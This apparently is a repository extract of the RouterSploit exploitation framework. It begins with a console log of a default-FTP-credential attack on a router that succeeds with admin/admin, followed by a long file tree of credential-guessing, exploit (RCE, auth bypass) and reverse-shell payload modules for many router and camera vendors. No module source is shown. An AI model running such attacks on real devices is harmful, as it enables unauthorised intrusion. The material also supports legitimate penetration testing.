rsf (Netcore Router Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Netcore Router Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06
gitextract_hxqwu9j7/
├── .dockerignore
├── .github/
│ ├── ISSUE_TEMPLATE.md
│ └── PULL_REQUEST_TEMPLATE.md
├── .gitignore
├── .travis/
│ ├── install.sh
│ └── run.sh
├── .travis.yml
├── CONTRIBUTING.md
├── Dockerfile
├── LICENSE
├── MANIFEST.in
├── Makefile
├── README.md
├── docker-compose.yaml
├── docs/
│ └── modules/
│ ├── creds/
│ │ ├── cameras/
│ │ │ ├── acti/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── american_dynamics/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── arecont/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── avigilon/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── avtech/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── axis/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── basler/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── brickcom/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── canon/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── cisco/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── dlink/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── geovision/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── grandstream/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── hikvision/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── honeywell/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── iqinvision/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── jvc/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── mobotix/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── samsung/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── sentry360/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── siemens/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── speco/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── stardot/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ ├── vacron/
│ │ │ │ ├── ftp_default_creds.md
│ │ │ │ ├── ssh_default_creds.md
│ │ │ │ └── telnet_default_creds.md
│ │ │ └── videoiq/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ └── routers/
│ │ ├── asmax/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── asus/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── belkin/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── bhu/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── billion/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── cisco/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── comtrend/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── dlink/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── fortinet/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── huawei/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── ipfire/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── juniper/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── linksys/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── mikrotik/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── movistar/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── netcore/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── netgear/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── netsys/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── pfsense/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── technicolor/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── thomson/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── tplink/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── ubiquiti/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ ├── zte/
│ │ │ ├── ftp_default_creds.md
│ │ │ ├── ssh_default_creds.md
│ │ │ └── telnet_default_creds.md
│ │ └── zyxel/
│ │ ├── ftp_default_creds.md
│ │ ├── ssh_default_creds.md
│ │ └── telnet_default_creds.md
│ ├── encoders/
│ │ ├── perl/
│ │ │ ├── base64.md
│ │ │ └── hex.md
│ │ ├── php/
│ │ │ ├── base64.md
│ │ │ └── hex.md
│ │ └── python/
│ │ ├── base64.md
│ │ └── hex.md
│ ├── exploits/
│ │ ├── cameras/
│ │ │ ├── acti/
│ │ │ │ └── acm_5611_rce.md
│ │ │ ├── geuterbruck/
│ │ │ │ └── efd_2250.md
│ │ │ ├── jovision/
│ │ │ │ └── jovision_credentials_disclosure.md
│ │ │ └── multi/
│ │ │ └── cctv_dvr_rce.md
│ │ ├── misc/
│ │ │ └── watchguard/
│ │ │ └── xcs_9_rce.md
│ │ └── routers/
│ │ ├── asus/
│ │ │ ├── asuswrt_lan_rce.md
│ │ │ └── infosvr_backdoor_rce.md
│ │ ├── cisco/
│ │ │ └── rv320_command_injection.md
│ │ ├── dlink/
│ │ │ ├── dir_655_866_652_rce.md
│ │ │ └── dsl_2750b_rce.md
│ │ ├── ipfire/
│ │ │ ├── ipfire_proxy_rce.md
│ │ │ └── ipfire_shellshock.md
│ │ ├── linksys/
│ │ │ └── eseries_themoon_rce.md
│ │ ├── mikrotik/
│ │ │ └── winbox_auth_bypass_creds_disclosure.md
│ │ ├── multi/
│ │ │ ├── tcp_32764_info_disclosure.md
│ │ │ └── tcp_32764_rce.md
│ │ └── zte/
│ │ └── zxhn_h108n_wifi_password_disclosure.md
│ ├── generic/
│ │ └── upnp/
│ │ └── ssdp_msearch.md
│ └── payloads/
│ ├── armle/
│ │ ├── bind_tcp.md
│ │ └── reverse_tcp.md
│ ├── cmd/
│ │ ├── awk_bind_tcp.md
│ │ ├── awk_bind_udp.md
│ │ ├── awk_reverse_tcp.md
│ │ ├── bash_reverse_tcp.md
│ │ ├── netcat_bind_tcp.md
│ │ ├── netcat_reverse_tcp.md
│ │ ├── perl_bind_tcp.md
│ │ ├── perl_reverse_tcp.md
│ │ ├── php_bind_tcp.md
│ │ ├── php_reverse_tcp.md
│ │ ├── python_bind_tcp.md
│ │ ├── python_bind_udp.md
│ │ ├── python_reverse_tcp.md
│ │ └── python_reverse_udp.md
│ ├── mipsbe/
│ │ ├── bind_tcp.md
│ │ └── reverse_tcp.md
│ ├── mipsle/
│ │ ├── bind_tcp.md
│ │ └── reverse_tcp.md
│ ├── perl/
│ │ ├── bind_tcp.md
│ │ └── reverse_tcp.md
│ ├── php/
│ │ ├── bind_tcp.md
│ │ └── reverse_tcp.md
│ ├── python/
│ │ ├── bind_tcp.md
│ │ ├── bind_udp.md
│ │ ├── reverse_tcp.md
│ │ └── reverse_udp.md
│ ├── x64/
│ │ ├── bind_tcp.md
│ │ └── reverse_tcp.md
│ └── x86/
│ ├── bind_tcp.md
│ └── reverse_tcp.md
├── requirements-dev.txt
├── requirements.txt
├── routersploit/
│ ├── __init__.py
│ ├── core/
│ │ ├── __init__.py
│ │ ├── bluetooth/
│ │ │ ├── __init__.py
│ │ │ ├── btle/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── btle_device.py
│ │ │ │ └── btle_scanner.py
│ │ │ └── btle_client.py
│ │ ├── exploit/
│ │ │ ├── __init__.py
│ │ │ ├── encoders.py
│ │ │ ├── exceptions.py
│ │ │ ├── exploit.py
│ │ │ ├── option.py
│ │ │ ├── payloads.py
│ │ │ ├── printer.py
│ │ │ ├── shell.py
│ │ │ └── utils.py
│ │ ├── ftp/
│ │ │ ├── __init__.py
│ │ │ └── ftp_client.py
│ │ ├── http/
│ │ │ ├── __init__.py
│ │ │ └── http_client.py
│ │ ├── snmp/
│ │ │ ├── __init__.py
│ │ │ └── snmp_client.py
│ │ ├── ssh/
│ │ │ ├── __init__.py
│ │ │ └── ssh_client.py
│ │ ├── tcp/
│ │ │ ├── __init__.py
│ │ │ └── tcp_client.py
│ │ ├── telnet/
│ │ │ ├── __init__.py
│ │ │ └── telnet_client.py
│ │ └── udp/
│ │ ├── __init__.py
│ │ └── udp_client.py
│ ├── interpreter.py
│ ├── libs/
│ │ ├── __init__.py
│ │ ├── apiros/
│ │ │ ├── __init__.py
│ │ │ └── apiros_client.py
│ │ └── lzs/
│ │ ├── __init__.py
│ │ └── lzs.py
│ ├── modules/
│ │ ├── __init__.py
│ │ ├── creds/
│ │ │ ├── __init__.py
│ │ │ ├── cameras/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── acti/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ ├── telnet_default_creds.py
│ │ │ │ │ └── webinterface_http_form_default_creds.py
│ │ │ │ ├── american_dynamics/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── arecont/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── avigilon/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── avtech/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── axis/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ ├── telnet_default_creds.py
│ │ │ │ │ └── webinterface_http_auth_default_creds.py
│ │ │ │ ├── basler/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ ├── telnet_default_creds.py
│ │ │ │ │ └── webinterface_http_form_default_creds.py
│ │ │ │ ├── brickcom/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ ├── telnet_default_creds.py
│ │ │ │ │ └── webinterface_http_auth_default_creds.py
│ │ │ │ ├── canon/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ ├── telnet_default_creds.py
│ │ │ │ │ └── webinterface_http_auth_default_creds.py
│ │ │ │ ├── cisco/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── dlink/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── geovision/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── grandstream/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── hikvision/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── honeywell/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── iqinvision/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── jvc/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── mobotix/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── samsung/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── sentry360/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── siemens/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── speco/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── stardot/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ ├── vacron/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── ftp_default_creds.py
│ │ │ │ │ ├── ssh_default_creds.py
│ │ │ │ │ └── telnet_default_creds.py
│ │ │ │ └── videoiq/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── generic/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_bruteforce.py
│ │ │ │ ├── ftp_default.py
│ │ │ │ ├── http_basic_digest_bruteforce.py
│ │ │ │ ├── http_basic_digest_default.py
│ │ │ │ ├── snmp_bruteforce.py
│ │ │ │ ├── ssh_bruteforce.py
│ │ │ │ ├── ssh_default.py
│ │ │ │ ├── telnet_bruteforce.py
│ │ │ │ └── telnet_default.py
│ │ │ ├── printers/
│ │ │ │ └── __init__.py
│ │ │ └── routers/
│ │ │ ├── 2wire/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── 3com/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── __init__.py
│ │ │ ├── asmax/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ ├── telnet_default_creds.py
│ │ │ │ └── webinterface_http_auth_default_creds.py
│ │ │ ├── asus/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── belkin/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── bhu/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── billion/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── cisco/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── comtrend/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── dlink/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── fortinet/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── huawei/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── ipfire/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── juniper/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── linksys/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── mikrotik/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── api_ros_default_creds.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── movistar/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── netcore/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── netgear/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── netsys/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── pfsense/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── webinterface_http_form_default_creds.py
│ │ │ ├── technicolor/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── thomson/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── tplink/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── ubiquiti/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ ├── zte/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ftp_default_creds.py
│ │ │ │ ├── ssh_default_creds.py
│ │ │ │ └── telnet_default_creds.py
│ │ │ └── zyxel/
│ │ │ ├── __init__.py
│ │ │ ├── ftp_default_creds.py
│ │ │ ├── ssh_default_creds.py
│ │ │ └── telnet_default_creds.py
│ │ ├── encoders/
│ │ │ ├── __init__.py
│ │ │ ├── perl/
│ │ │ │ ├── base64.py
│ │ │ │ └── hex.py
│ │ │ ├── php/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── base64.py
│ │ │ │ └── hex.py
│ │ │ └── python/
│ │ │ ├── __init__.py
│ │ │ ├── base64.py
│ │ │ └── hex.py
│ │ ├── exploits/
│ │ │ ├── __init__.py
│ │ │ ├── cameras/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── acti/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── acm_5611_rce.py
│ │ │ │ ├── avigilon/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── videoiq_camera_path_traversal.py
│ │ │ │ ├── beward/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── n100_rce.py
│ │ │ │ ├── brickcom/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── corp_network_cameras_conf_disclosure.py
│ │ │ │ │ └── users_cgi_creds_disclosure.py
│ │ │ │ ├── cisco/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── video_surv_path_traversal.py
│ │ │ │ ├── dlink/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── dcs_930l_932l_auth_bypass.py
│ │ │ │ ├── geuterbruck/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── efd_2250.py
│ │ │ │ ├── grandstream/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── gxv3611hd_ip_camera_backdoor.py
│ │ │ │ │ └── gxv3611hd_ip_camera_sqli.py
│ │ │ │ ├── honeywell/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── hicc_1100pt_password_disclosure.py
│ │ │ │ ├── jovision/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── jovision_credentials_disclosure.py
│ │ │ │ ├── multi/
│ │ │ │ │ ├── P2P_wificam_credential_disclosure.py
│ │ │ │ │ ├── P2P_wificam_rce.py
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ ├── cctv_dvr_rce.py
│ │ │ │ │ ├── dvr_creds_disclosure.py
│ │ │ │ │ ├── jvc_vanderbilt_honeywell_path_traversal.py
│ │ │ │ │ └── netwave_ip_camera_information_disclosure.py
│ │ │ │ ├── mvpower/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── dvr_jaws_rce.py
│ │ │ │ ├── siemens/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── cvms2025_credentials_disclosure.py
│ │ │ │ └── xiongmai/
│ │ │ │ ├── __init__.py
│ │ │ │ └── uc_httpd_path_traversal.py
│ │ │ ├── generic/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── heartbleed.py
│ │ │ │ ├── shellshock.py
│ │ │ │ └── ssh_auth_keys.py
│ │ │ ├── misc/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── asus/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── b1m_projector_rce.py
│ │ │ │ ├── miele/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── pg8528_path_traversal.py
│ │ │ │ ├── watchguard/
│ │ │ │ │ ├── __init__.py
│ │ │ │ │ └── xcs_9_rce.py
│ │ │ │ └── wepresent/
│ │ │ │ ├── __init__.py
│ │ │ │ └── wipg1000_rce.py
│ │ │ └── routers/
│ │ │ ├── 2wire/
│ │ │ │ ├── 4011g_5012nv_path_traversal.py
│ │ │ │ ├── __init__.py
│ │ │ │ └── gateway_auth_bypass.py
│ │ │ ├── 3com/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ap8760_password_disclosure.py
│ │ │ │ ├── imc_info_disclosure.py
│ │ │ │ ├── imc_path_traversal.py
│ │ │ │ ├── officeconnect_info_disclosure.py
│ │ │ │ └── officeconnect_rce.py
│ │ │ ├── __init__.py
│ │ │ ├── asmax/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── ar_1004g_password_disclosure.py
│ │ │ │ └── ar_804_gu_rce.py
│ │ │ ├── asus/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── asuswrt_lan_rce.py
│ │ │ │ ├── infosvr_backdoor_rce.py
│ │ │ │ └── rt_n16_password_disclosure.py
│ │ │ ├── belkin/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── auth_bypass.py
│ │ │ │ ├── g_n150_password_disclosure.py
│ │ │ │ ├── g_plus_info_disclosure.py
│ │ │ │ ├── n150_path_traversal.py
│ │ │ │ ├── n750_rce.py
│ │ │ │ └── play_max_prce.py
│ │ │ ├── bhu/
│ │ │ │ ├── __init__.py
│ │ │ │ └── bhu_urouter_rce.py
│ │ │ ├── billion/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── billion_5200w_rce.py
│ │ │ │ └── billion_7700nr4_password_disclosure.py
│ │ │ ├── cisco/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── catalyst_2960_rocem.py
│ │ │ │ ├── dpc2420_info_disclosure.py
│ │ │ │ ├── firepower_management60_path_traversal.py
│ │ │ │ ├── firepower_management60_rce.py
│ │ │ │ ├── ios_http_authorization_bypass.py
│ │ │ │ ├── rv320_command_injection.py
│ │ │ │ ├── secure_acs_bypass.py
│ │ │ │ ├── ucm_info_disclosure.py
│ │ │ │ ├── ucs_manager_rce.py
│ │ │ │ └── unified_multi_path_traversal.py
│ │ │ ├── comtrend/
│ │ │ │ ├── __init__.py
│ │ │ │ └── ct_5361t_password_disclosure.py
│ │ │ ├── dlink/
│ │ │ │ ├── __init__.py
│ │ │ │ ├── dcs_930l_auth_rce.py
│ │ │ │ ├── dgs_1510_add_user.py
